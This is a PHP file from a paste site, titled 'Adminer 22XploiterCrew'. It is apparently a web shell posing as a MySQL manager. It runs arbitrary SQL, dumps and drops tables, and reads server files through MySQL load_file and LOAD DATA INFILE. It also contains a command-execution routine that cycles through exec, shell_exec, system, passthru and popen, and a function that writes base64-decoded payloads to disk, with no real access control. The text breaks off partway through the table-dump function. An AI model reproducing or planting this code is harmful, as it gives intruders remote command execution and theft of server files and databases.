· 6 years ago · Aug 08, 2019, 05:20 PM
1<?php
2error_reporting(7);
3@set_magic_quotes_runtime(0);
4ob_start();
5$mtime = explode(' ', microtime());
6$starttime = $mtime[1] + $mtime[0];
7define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
8//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
9define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
10define('IS_COM', class_exists('COM') ? 1 : 0 );
11define('IS_GPC', get_magic_quotes_gpc());
12$dis_func = get_cfg_var('disable_functions');
13define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
14@set_time_limit(0);
15
16foreach(array('_GET','_POST') as $_request) {
17foreach($$_request as $_key => $_value) {
18if ($_key{0} != '_') {
19if (IS_GPC) {
20$_value = s_array($_value);
21}
22$$_key = $_value;
23}
24}
25}
26
27if ($charset == 'utf8') {
28header("content-Type: text/html; charset=utf-8");
29} elseif ($charset == 'big5') {
30header("content-Type: text/html; charset=big5");
31} elseif ($charset == 'gbk') {
32header("content-Type: text/html; charset=gbk");
33} elseif ($charset == 'latin1') {
34header("content-Type: text/html; charset=iso-8859-2");
35}
36
37$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
38$timestamp = time();
39
40
41if ($doing == 'backupmysql' && !$saveasfile) {
42dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
43$table = array_flip($table);
44$result = q("SHOW tables");
45if (!$result) p('<h2>'.mysql_error().'</h2>');
46$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
47header('Content-type: application/unknown');
48header('Content-Disposition: attachment; filename='.$filename);
49$mysqldata = '';
50while ($currow = mysql_fetch_array($result)) {
51if (isset($table[$currow[0]])) {
52$mysqldata .= sqldumptable($currow[0]);
53}
54}
55mysql_close();
56exit;
57}
58
59
60if($doing=='mysqldown'){
61if (!$dbname) {
62$errmsg = 'Please input dbname';
63} else {
64dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
65if (!file_exists($mysqldlfile)) {
66$errmsg = 'The file you want Downloadable was nonexistent';
67} else {
68$result = q("select load_file('$mysqldlfile');");
69if(!$result){
70q("DROP TABLE IF EXISTS tmp_angel;");
71q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
72q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
73$result = q("select content from tmp_angel");
74q("DROP TABLE tmp_angel");
75}
76$row = @mysql_fetch_array($result);
77if (!$row) {
78$errmsg = 'Load file failed '.mysql_error();
79} else {
80$fileinfo = pathinfo($mysqldlfile);
81header('Content-type: application/x-'.$fileinfo['extension']);
82header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
83header("Accept-Length: ".strlen($row[0]));
84echo $row[0];
85exit;
86} } } }
87?>
88
89<html>
90<head>
91<meta http-equiv="Content-Type" content="text/html; charset=gbk">
92<title>Adminer 22XploiterCrew</title>
93<style type="text/css">
94body,td{font: 12px Arial,Tahoma;line-height: 16px;}
95.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
96.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
97.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
98a {color: #00f;text-decoration:underline;}
99a:hover{color: #f00;text-decoration:none;}
100.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
101.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
102.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
103.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
104.head td span{font-weight:normal;}
105form{margin:0;padding:0;}
106h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
107ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
108u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
109</style>
110<script type="text/javascript">
111function CheckAll(form) {
112for(var i=0;i<form.elements.length;i++) {
113var e = form.elements[i];
114if (e.name != 'chkall')
115e.checked = form.chkall.checked;
116} }
117function $(id) {
118return document.getElementById(id);
119}
120function goaction(act){
121$('goaction').action.value=act;
122$('goaction').submit();
123}
124</script>
125</head>
126<body style="margin:0;table-layout:fixed; word-break:break-all">
127 <div class="table-responsive-lg">
128<table width="100%" border="0" cellpadding="0" cellspacing="0">
129<tr class="alt1">
130<td><span style="float:right;">Safe Mode:<?php echo getcfg('safe_mode');?></span>
131<a href="javascript:goaction('logout');">Logout</a>
132<a href="javascript:goaction('sqladmin');"></a>
133</td></tr></table>
134
135<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
136<?php
137
138formhead(array('name'=>'goaction'));
139makehide('action');
140formfoot();
141
142if (!$action || $action == 'sqladmin') {
143!$dbhost && $dbhost = 'localhost';
144!$dbuser && $dbuser = '';
145!$dbport && $dbport = '3306';
146$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
147
148if(isset($dbhost)){
149$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
150} if(isset($dbuser)) {
151$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
152} if(isset($dbpass)) {
153$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
154} if(isset($dbport)) {
155$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
156} if(isset($dbname)) {
157$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
158} if(isset($charset)) {
159$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
160}
161
162
163if ($doing == 'backupmysql' && $saveasfile) {
164if (!$table) {
165m('Please choose the table');
166} else {
167dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
168$table = array_flip($table);
169$fp = @fopen($path,'w');
170if ($fp) {
171$result = q('SHOW tables');
172if (!$result) p('<h2>'.mysql_error().'</h2>');
173$mysqldata = '';
174while ($currow = mysql_fetch_array($result)) {
175if (isset($table[$currow[0]])) {
176sqldumptable($currow[0], $fp);
177}
178}
179fclose($fp);
180$fileurl = str_replace(SA_ROOT,'',$path);
181m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
182mysql_close();
183} else {
184m('Backup failed');
185}
186}
187}
188if ($insert && $insertsql) {
189$keystr = $valstr = $tmp = '';
190foreach($insertsql as $key => $val) {
191if ($val) {
192$keystr .= $tmp.$key;
193$valstr .= $tmp."'".addslashes($val)."'";
194$tmp = ',';
195}
196}
197if ($keystr && $valstr) {
198dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
199m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
200}
201}
202if ($update && $insertsql && $base64) {
203$valstr = $tmp = '';
204foreach($insertsql as $key => $val) {
205$valstr .= $tmp.$key."='".addslashes($val)."'";
206$tmp = ',';
207}
208if ($valstr) {
209$where = base64_decode($base64);
210dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
211m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
212}
213}
214if ($doing == 'del' && $base64) {
215$where = base64_decode($base64);
216$delete_sql = "DELETE FROM $tablename WHERE $where";
217dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
218m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
219}
220
221if ($tablename && $doing == 'drop') {
222dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
223if (q("DROP TABLE $tablename")) {
224m('Drop table of success');
225$tablename = '';
226} else {
227m(mysql_error());
228}
229}
230
231$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
232
233formhead(array('title'=>'MYSQL Manager'));
234makehide('action','sqladmin');
235p('<center><p>');
236p('DB Host :');
237makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
238p('<p>');
239p('DB User :');
240makeinput(array('name'=>'dbuser','size'=>20,'value'=>$dbuser));
241p('<p>');
242p('DB Pass :');
243makeinput(array('name'=>'dbpass','size'=>20,'value'=>$dbpass));
244p('<p>');
245makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
246p('</p></center>');
247formfoot();
248?>
249<script type="text/javascript">
250function editrecord(action, base64, tablename){
251if (action == 'del') {
252if (!confirm('Is or isn\'t deletion record?')) return;
253}
254$('recordlist').doing.value=action;
255$('recordlist').base64.value=base64;
256$('recordlist').tablename.value=tablename;
257$('recordlist').submit();
258}
259function moddbname(dbname) {
260if(!dbname) return;
261$('setdbname').dbname.value=dbname;
262$('setdbname').submit();
263}
264function settable(tablename,doing,page) {
265if(!tablename) return;
266if (doing) {
267$('settable').doing.value=doing;
268}
269if (page) {
270$('settable').page.value=page;
271}
272$('settable').tablename.value=tablename;
273$('settable').submit();
274}
275</script>
276<?php
277
278formhead(array('name'=>'recordlist'));
279makehide('doing');
280makehide('action','sqladmin');
281makehide('base64');
282makehide('tablename');
283p($dbform);
284formfoot();
285
286
287formhead(array('name'=>'setdbname'));
288makehide('action','sqladmin');
289p($dbform);
290if (!$dbname) {
291makehide('dbname');
292}
293formfoot();
294
295
296formhead(array('name'=>'settable'));
297makehide('action','sqladmin');
298p($dbform);
299makehide('tablename');
300makehide('page',$page);
301makehide('doing');
302formfoot();
303
304$cachetables = array();
305$pagenum = 30;
306$page = intval($page);
307if($page) {
308$start_limit = ($page - 1) * $pagenum;
309} else {
310$start_limit = 0;
311$page = 1;
312}
313if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
314dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
315$mysqlver = mysql_get_server_info();
316p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
317$highver = $mysqlver > '4.1' ? 1 : 0;
318
319$query = q("SHOW DATABASES");
320$dbs = array();
321$dbs[] = '-- Select a database --';
322while($db = mysql_fetch_array($query)) {
323$dbs[$db['Database']] = $db['Database'];
324}
325makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
326$tabledb = array();
327if ($dbname) {
328p('<p>');
329p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
330if ($tablename) {
331p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Data</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
332}
333p('</p>');
334mysql_select_db($dbname);
335
336$getnumsql = '';
337$runquery = 0;
338if ($sql_query) {
339$runquery = 1;
340}
341$allowedit = 0;
342if ($tablename && !$sql_query) {
343$sql_query = "SELECT * FROM $tablename";
344$getnumsql = $sql_query;
345$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
346$allowedit = 1;
347}
348p('<form action="'.$self.'" method="POST">');
349p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
350makehide('tablename', $tablename);
351makehide('action','sqladmin');
352p($dbform);
353p('</form>');
354if ($tablename || ($runquery && $sql_query)) {
355if ($doing == 'structure') {
356$result = q("SHOW COLUMNS FROM $tablename");
357$rowdb = array();
358while($row = mysql_fetch_array($result)) {
359$rowdb[] = $row;
360}
361p('<table border="0" cellpadding="3" cellspacing="0">');
362p('<tr class="head">');
363p('<td>Field</td>');
364p('<td>Type</td>');
365p('<td>Null</td>');
366p('<td>Key</td>');
367p('<td>Default</td>');
368p('<td>Extra</td>');
369p('</tr>');
370foreach ($rowdb as $row) {
371$thisbg = bg();
372p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
373p('<td>'.$row['Field'].'</td>');
374p('<td>'.$row['Type'].'</td>');
375p('<td>'.$row['Null'].' </td>');
376p('<td>'.$row['Key'].' </td>');
377p('<td>'.$row['Default'].' </td>');
378p('<td>'.$row['Extra'].' </td>');
379p('</tr>');
380}
381tbfoot();
382} elseif ($doing == 'insert' || $doing == 'edit') {
383$result = q('SHOW COLUMNS FROM '.$tablename);
384while ($row = mysql_fetch_array($result)) {
385$rowdb[] = $row;
386}
387$rs = array();
388if ($doing == 'insert') {
389p('<h2>Insert new line in '.$tablename.' table »</h2>');
390} else {
391p('<h2>Update record in '.$tablename.' table »</h2>');
392$where = base64_decode($base64);
393$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
394$rs = mysql_fetch_array($result);
395}
396p('<form method="post" action="'.$self.'">');
397p($dbform);
398makehide('action','sqladmin');
399makehide('tablename',$tablename);
400p('<table border="0" cellpadding="3" cellspacing="0">');
401foreach ($rowdb as $row) {
402if ($rs[$row['Field']]) {
403$value = htmlspecialchars($rs[$row['Field']]);
404} else {
405$value = '';
406}
407$thisbg = bg();
408p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
409p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
410}
411if ($doing == 'insert') {
412p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
413} else {
414p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
415makehide('base64', $base64);
416}
417p('</table></form>');
418} else {
419$querys = @explode(';',$sql_query);
420foreach($querys as $num=>$query) {
421if ($query) {
422p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
423switch(qy($query))
424{
425case 0:
426p('<h2>Error : '.mysql_error().'</h2>');
427break;
428case 1:
429if (strtolower(substr($query,0,13)) == 'select * from') {
430$allowedit = 1;
431}
432if ($getnumsql) {
433$tatol = mysql_num_rows(q($getnumsql));
434$multipage = multi($tatol, $pagenum, $page, $tablename);
435}
436if (!$tablename) {
437$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
438$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
439preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
440$tablename = $matches[1][0];
441}
442$result = q($query);
443p($multipage);
444p('<table border="0" cellpadding="3" cellspacing="0">');
445p('<tr class="head">');
446if ($allowedit) p('<td>Action</td>');
447$fieldnum = @mysql_num_fields($result);
448for($i=0;$i<$fieldnum;$i++){
449$name = @mysql_field_name($result, $i);
450$type = @mysql_field_type($result, $i);
451$len = @mysql_field_len($result, $i);
452p("<td nowrap>$name<br><span>$type($len)</span></td>");
453}
454p('</tr>');
455while($mn = @mysql_fetch_assoc($result)){
456$thisbg = bg();
457p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
458$where = $tmp = $b1 = '';
459foreach($mn as $key=>$inside){
460if ($inside) {
461$where .= $tmp.$key."='".addslashes($inside)."'";
462$tmp = ' AND ';
463}
464$b1 .= '<td nowrap>'.html_clean($inside).' </td>';
465}
466$where = base64_encode($where);
467if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
468p($b1);
469p('</tr>');
470unset($b1);
471}
472tbfoot();
473p($multipage);
474break;
475case 2:
476$ar = mysql_affected_rows();
477p('<h2>affected rows : <b>'.$ar.'</b></h2>');
478break;
479}
480}
481}
482}
483} else {
484$query = q("SHOW TABLE STATUS");
485$table_num = $table_rows = $data_size = 0;
486$tabledb = array();
487while($table = mysql_fetch_array($query)) {
488$data_size = $data_size + $table['Data_length'];
489$table_rows = $table_rows + $table['Rows'];
490$table['Data_length'] = sizecount($table['Data_length']);
491$table_num++;
492$tabledb[] = $table;
493}
494$data_size = sizecount($data_size);
495unset($table);
496p('<table border="0" cellpadding="0" cellspacing="0">');
497p('<form action="'.$self.'" method="POST">');
498makehide('action','sqladmin');
499p($dbform);
500p('<tr class="head">');
501p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
502p('<td>Name</td>');
503p('<td>Rows</td>');
504p('<td>Data_length</td>');
505p('<td>Create_time</td>');
506p('<td>Update_time</td>');
507if ($highver) {
508p('<td>Engine</td>');
509p('<td>Collation</td>');
510}
511p('</tr>');
512foreach ($tabledb as $key => $table) {
513$thisbg = bg();
514p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
515p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
516p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
517p('<td>'.$table['Rows'].'</td>');
518p('<td>'.$table['Data_length'].'</td>');
519p('<td>'.$table['Create_time'].'</td>');
520p('<td>'.$table['Update_time'].'</td>');
521if ($highver) {
522p('<td>'.$table['Engine'].'</td>');
523p('<td>'.$table['Collation'].'</td>');
524}
525p('</tr>');
526}
527p('<tr class='.bg().'>');
528p('<td> </td>');
529p('<td>Total tables: '.$table_num.'</td>');
530p('<td>'.$table_rows.'</td>');
531p('<td>'.$data_size.'</td>');
532p('<td colspan="'.($highver ? 4 : 2).'"> </td>');
533p('</tr>');
534p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
535makehide('doing','backupmysql');
536formfoot();
537p("</table>");
538fr($query);
539}
540}
541}
542tbfoot();
543@mysql_close();
544}
545?>
546</td></tr></table>
547</body>
548</html>
549
550<?php
551
552function m($msg) {
553echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
554echo $msg;
555echo '</div>';
556}
557function scookie($key, $value, $life = 0, $prefix = 1) {
558global $admin, $timestamp, $_SERVER;
559$key = ($prefix ? $admin['cookiepre'] : '').$key;
560$life = $life ? $life : $admin['cookielife'];
561$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
562setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
563}
564function multi($num, $perpage, $curpage, $tablename) {
565$multipage = '';
566if($num > $perpage) {
567$page = 10;
568$offset = 5;
569$pages = @ceil($num / $perpage);
570if($page > $pages) {
571$from = 1;
572$to = $pages;
573} else {
574$from = $curpage - $offset;
575$to = $curpage + $page - $offset - 1;
576if($from < 1) {
577$to = $curpage + 1 - $from;
578$from = 1;
579if(($to - $from) < $page && ($to - $from) < $pages) {
580$to = $page;
581}
582} elseif($to > $pages) {
583$from = $curpage - $pages + $to;
584$to = $pages;
585if(($to - $from) < $page && ($to - $from) < $pages) {
586$from = $pages - $page + 1;
587}
588}
589}
590$multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
591for($i = $from; $i <= $to; $i++) {
592$multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
593}
594$multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
595$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
596}
597return $multipage;
598}
599function loginpage() {
600?>
601<style type="text/css">
602input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
603</style>
604<form method="POST" action="">
605<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
606<input type="hidden" name="doing" value="login">
607<input type="submit" value="Login">
608</form>
609<?php
610exit;
611}//end loginpage()
612
613function execute($cfe) {
614$res = '';
615if ($cfe) {
616if(function_exists('exec')) {
617@exec($cfe,$res);
618$res = join("\n",$res);
619} elseif(function_exists('shell_exec')) {
620$res = @shell_exec($cfe);
621} elseif(function_exists('system')) {
622@ob_start();
623@system($cfe);
624$res = @ob_get_contents();
625@ob_end_clean();
626} elseif(function_exists('passthru')) {
627@ob_start();
628@passthru($cfe);
629$res = @ob_get_contents();
630@ob_end_clean();
631} elseif(@is_resource($f = @popen($cfe,"r"))) {
632$res = '';
633while(!@feof($f)) {
634$res .= @fread($f,1024);
635}
636@pclose($f);
637}
638}
639return $res;
640}
641function which($pr) {
642$path = execute("which $pr");
643return ($path ? $path : $pr);
644}
645
646function cf($fname,$text){
647if($fp=@fopen($fname,'w')) {
648@fputs($fp,@base64_decode($text));
649@fclose($fp);
650}
651}
652
653function debuginfo() {
654global $starttime;
655$mtime = explode(' ', microtime());
656$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
657echo 'Processed in '.$totaltime.' second(s)';
658}
659
660
661function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
662if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
663p('<h2>Can not connect to MySQL server</h2>');
664exit;
665}
666if($link && $dbname) {
667if (!@mysql_select_db($dbname, $link)) {
668p('<h2>Database selected has error</h2>');
669exit;
670}
671}
672if($link && mysql_get_server_info() > '4.1') {
673if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
674q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
675}
676}
677return $link;
678}
679
680
681function s_array(&$array) {
682if (is_array($array)) {
683foreach ($array as $k => $v) {
684$array[$k] = s_array($v);
685}
686} else if (is_string($array)) {
687$array = stripslashes($array);
688}
689return $array;
690}
691
692
693function html_clean($content) {
694$content = htmlspecialchars($content);
695$content = str_replace("\n", "<br />", $content);
696$content = str_replace(" ", " ", $content);
697$content = str_replace("\t", " ", $content);
698return $content;
699}
700
701function bg() {
702global $bgc;
703return ($bgc++%2==0) ? 'alt1' : 'alt2';
704}
705
706
707function getPath($scriptpath, $nowpath) {
708if ($nowpath == '.') {
709$nowpath = $scriptpath;
710}
711$nowpath = str_replace('\\', '/', $nowpath);
712$nowpath = str_replace('//', '/', $nowpath);
713if (substr($nowpath, -1) != '/') {
714$nowpath = $nowpath.'/';
715}
716return $nowpath;
717}
718
719
720function getUpPath($nowpath) {
721$pathdb = explode('/', $nowpath);
722$num = count($pathdb);
723if ($num > 2) {
724unset($pathdb[$num-1],$pathdb[$num-2]);
725}
726$uppath = implode('/', $pathdb).'/';
727$uppath = str_replace('//', '/', $uppath);
728return $uppath;
729}
730
731
732function getcfg($varname) {
733$result = get_cfg_var($varname);
734if ($result == 0) {
735return 'No';
736} elseif ($result == 1) {
737return 'Yes';
738} else {
739return $result;
740}
741}
742
743
744function getfun($funName) {
745return (false !== function_exists($funName)) ? 'Yes' : 'No';
746}
747
748
749
750function qy($sql) {
751//echo $sql.'<br>';
752$res = $error = '';
753if(!$res = @mysql_query($sql)) {
754return 0;
755} else if(is_resource($res)) {
756return 1;
757} else {
758return 2;
759}
760return 0;
761}
762
763function q($sql) {
764return @mysql_query($sql);
765}
766
767function fr($qy){
768mysql_free_result($qy);
769}
770
771function sizecount($size) {
772if($size > 1073741824) {
773$size = round($size / 1073741824 * 100) / 100 . ' Gb';
774} elseif($size > 1048576) {
775$size = round($size / 1048576 * 100) / 100 . ' Mb';
776} elseif($size > 1024) {
777$size = round($size / 1024 * 100) / 100 . ' Kb';
778} else {
779$size = $size . ' Bytes';
780}
781return $size;
782}
783
784class PHPZip{
785var $out='';
786function PHPZip($dir) {
787if (@function_exists('gzcompress')) {
788$curdir = getcwd();
789if (is_array($dir)) $filelist = $dir;
790else{
791$filelist=$this -> GetFileList($dir);//+-+ --#э
792foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
793}
794if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
795else chdir($curdir);
796if (count($filelist)>0){
797foreach($filelist as $filename){
798if (is_file($filename)){
799$fd = fopen ($filename, 'r');
800$content = @fread ($fd, filesize($filename));
801fclose ($fd);
802if (is_array($dir)) $filename = basename($filename);
803$this -> addFile($content, $filename);
804}
805}
806$this->out = $this -> file();
807chdir($curdir);
808}
809return 1;
810}
811else return 0;
812}
813
814function GetFileList($dir){
815static $a;
816if (is_dir($dir)) {
817if ($dh = opendir($dir)) {
818while ($file = readdir($dh)) {
819if($file!='.' && $file!='..'){
820$f=$dir .'/'. $file;
821if(is_dir($f)) $this->GetFileList($f);
822$a[]=$f;
823}
824}
825closedir($dh);
826}
827}
828return $a;
829}
830
831
832
833var $datasec = array();
834var $ctrl_dir = array();
835var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
836var $old_offset = 0;
837
838function unix2DosTime($unixtime = 0) {
839$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
840if ($timearray['year'] < 1980) {
841$timearray['year'] = 1980;
842$timearray['mon'] = 1;
843$timearray['mday'] = 1;
844$timearray['hours'] = 0;
845$timearray['minutes'] = 0;
846$timearray['seconds'] = 0;
847} // end if
848return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
849($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
850}
851
852function addFile($data, $name, $time = 0) {
853$name = str_replace('\\', '/', $name);
854$dtime = dechex($this->unix2DosTime($time));
855$hexdtime = '\x' . $dtime[6] . $dtime[7]
856. '\x' . $dtime[4] . $dtime[5]
857. '\x' . $dtime[2] . $dtime[3]
858. '\x' . $dtime[0] . $dtime[1];
859eval('$hexdtime = "' . $hexdtime . '";');
860$fr = "\x50\x4b\x03\x04";
861$fr .= "\x14\x00";
862$fr .= "\x00\x00";
863$fr .= "\x08\x00";
864$fr .= $hexdtime;
865
866$unc_len = strlen($data);
867$crc = crc32($data);
868$zdata = gzcompress($data);
869$c_len = strlen($zdata);
870$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
871$fr .= pack('V', $crc);
872$fr .= pack('V', $c_len);
873$fr .= pack('V', $unc_len);
874$fr .= pack('v', strlen($name));
875$fr .= pack('v', 0);
876$fr .= $name;
877$fr .= $zdata;
878$fr .= pack('V', $crc);
879$fr .= pack('V', $c_len);
880$fr .= pack('V', $unc_len);
881
882$this -> datasec[] = $fr;
883$new_offset = strlen(implode('', $this->datasec));
884
885$cdrec = "\x50\x4b\x01\x02";
886$cdrec .= "\x00\x00";
887$cdrec .= "\x14\x00";
888$cdrec .= "\x00\x00";
889$cdrec .= "\x08\x00";
890$cdrec .= $hexdtime;
891$cdrec .= pack('V', $crc);
892$cdrec .= pack('V', $c_len);
893$cdrec .= pack('V', $unc_len);
894$cdrec .= pack('v', strlen($name) );
895$cdrec .= pack('v', 0 );
896$cdrec .= pack('v', 0 );
897$cdrec .= pack('v', 0 );
898$cdrec .= pack('v', 0 );
899$cdrec .= pack('V', 32 );
900$cdrec .= pack('V', $this -> old_offset );
901$this -> old_offset = $new_offset;
902$cdrec .= $name;
903$this -> ctrl_dir[] = $cdrec;
904}
905
906function file() {
907$data = implode('', $this -> datasec);
908$ctrldir = implode('', $this -> ctrl_dir);
909return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
910}
911}
912
913
914function sqldumptable($table, $fp=0) {
915$tabledump = "DROP TABLE IF EXISTS $table;\n";
916$tabledump .= "CREATE TABLE $table (\n";
917$firstfield=1;
918$fields = q("SHOW FIELDS FROM $table");
919while ($field = mysql_fetch_array($fields)) {
